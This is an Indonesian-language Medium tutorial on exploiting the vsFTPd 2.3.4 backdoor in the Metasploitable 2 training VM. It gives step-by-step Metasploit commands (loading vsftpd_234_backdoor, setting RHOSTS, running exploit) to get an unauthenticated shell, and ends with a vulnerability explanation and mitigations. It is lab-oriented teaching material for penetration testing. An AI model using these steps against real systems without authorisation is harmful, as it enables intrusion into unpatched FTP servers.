Tutorial: Exploitasi Backdoor vsFTPd 2.3.4 Port 21 FTP pada Metasploitable 2
DISCLAIMER
Tutorial: Exploitasi Backdoor vsFTPd 2.3.4 Port 21 FTP pada Metasploitable 2
DISCLAIMER
Seluruh konten yang disampaikan dalam tulisan ini dibuat untuk tujuan edukasi dan pembelajaran di bidang keamanan siber. Informasi, teknik, maupun demonstrasi yang ditampilkan tidak dimaksudkan untuk digunakan dalam aktivitas yang melanggar hukum, merusak sistem, atau merugikan pihak mana pun.
Segala bentuk tindakan yang dilakukan berdasarkan informasi dari konten ini sepenuhnya menjadi tanggung jawab masing-masing pembaca. Pembuat konten tidak bertanggung jawab atas penyalahgunaan informasi maupun konsekuensi hukum yang timbul.
Harap selalu menerapkan praktik keamanan secara etis, melakukan pengujian hanya pada sistem yang Anda miliki atau Anda peroleh izin resminya, serta mematuhi seluruh peraturan dan hukum yang berlaku.
Metasploitable 2 memiliki layanan FTP yang rentan dengan versi vsFTPd 2.3.4 yang mengandung backdoor terkenal. Dalam tutorial ini, kita akan memanfaatkan kerentanan ini untuk mendapatkan akses shell pada sistem target.
1. Persiapan Environment
Mulai Layanan PostgreSQL
Metasploit Framework membutuhkan database PostgreSQL untuk operasionalnya. Jalankan perintah berikut:
service postgresql start
Anda mungkin akan diminta memasukkan password sistem:

Gambar 1. Authentication untuk Menjalankan PostgreSQL
Verifikasi Status PostgreSQL
Pastikan layanan PostgreSQL sudah aktif dengan perintah:
service postgresql status
Pastikan status menunjukkan active.
2. Memulai Metasploit Framework
Jalankan konsol Metasploit dengan perintah:
msfconsole
Tunggu hingga interface Metasploit sepenuhnya terbuka dan siap digunakan.

Gambar 2. Tampilan Interface Metasploit
3. Mencari Eksploit yang Tepat
Kita akan mencari eksploit untuk vsFTPd 2.3.4 menggunakan fitur search:
search vsftpd 2.3.4
Hasil pencarian akan menampilkan eksploit backdoor yang tersedia.

Gambar 3. Hasil Pencarian Eksploit Backdoor vsFTPd 2.3.4
4. Konfigurasi Eksploit
Gunakan Modul Eksploit
Pilih dan gunakan modul eksploit backdoor vsFTPd:
use exploit/unix/ftp/vsftpd_234_backdoor
Cek Opsi yang Tersedia
Lihat opsi yang perlu dikonfigurasi:
show options

Gambar 4. Hasil show options
Perhatikan bahwa RHOSTS masih kosong dan perlu diisi.
Set Target IP
Atur alamat IP target Metasploitable 2:
set RHOSTS 192.168.1.10
(Ganti 192.168.1.10 dengan IP address Metasploitable 2 Anda)
Verifikasi Konfigurasi
Cek kembali opsi untuk memastikan konfigurasi sudah benar:
show options
Pastikan RHOSTS sudah terisi dengan IP target yang benar.
5. Melakukan Eksploitasi
Jalankan eksploitasi dengan perintah:
exploit
6. Verifikasi Keberhasilan
Jika berhasil, Anda akan mendapatkan shell akses pada sistem target. Verifikasi dengan perintah:
whoami
Untuk memastikan Anda berada di sistem target, periksa IP address:
ifconfig
Indikasi keberhasilan:
- Perintah
whoamimenampilkan user sistem target - IP address yang ditampilkan
ifconfigsesuai dengan IP Metasploitable 2 - Prompt berubah menjadi shell sistem target
Penjelasan Kerentanan
vsFTPd 2.3.4 mengandung backdoor yang diaktifkan ketika username mengandung karakter tertentu (:). Backdoor ini membuka port yang dapat digunakan untuk mendapatkan akses shell tanpa otentikasi.
Langkah Pencegahan
- Upgrade vsFTPd ke versi terbaru
- Monitor koneksi jaringan yang mencurigakan
- Gunakan firewall untuk membatasi akses ke port FTP
- Implementasi intrusion detection system
Disclaimer: Tutorial ini hanya untuk tujuan edukasi dan testing dalam lingkungan yang terkontrol. Selalu dapatkan izin tertulis sebelum melakukan testing pada sistem mana pun.
Dengan mengikuti tutorial ini, Anda berhasil mengeksploitasi kerentanan backdoor pada vsFTPd 2.3.4 dan mendapatkan akses shell pada sistem target. Eksploitasi ini menunjukkan pentingnya menjaga software selalu up-to-date.
Jika ada pertanyaan atau kendala, silakan tinggalkan komentar di bawah!
메타데이터
- post_id
- 4450fa49ff89
- slug
- tutorial-exploitasi-backdoor-vsftpd-2-3-4-port-21-ftp-pada-metasploitable-2-4450fa49ff89
- url
- https://medium.com/@ferenpublic/tutorial-exploitasi-backdoor-vsftpd-2-3-4-port-21-ftp-pada-metasploitable-2-4450fa49ff89
- canonical_url
- https://medium.com/@ferenpublic/tutorial-exploitasi-backdoor-vsftpd-2-3-4-port-21-ftp-pada-metasploitable-2-4450fa49ff89
- author_url
- https://medium.com/@ferenpublic
- status
- ok
- fetched_at
- 2026-07-16 22:15:16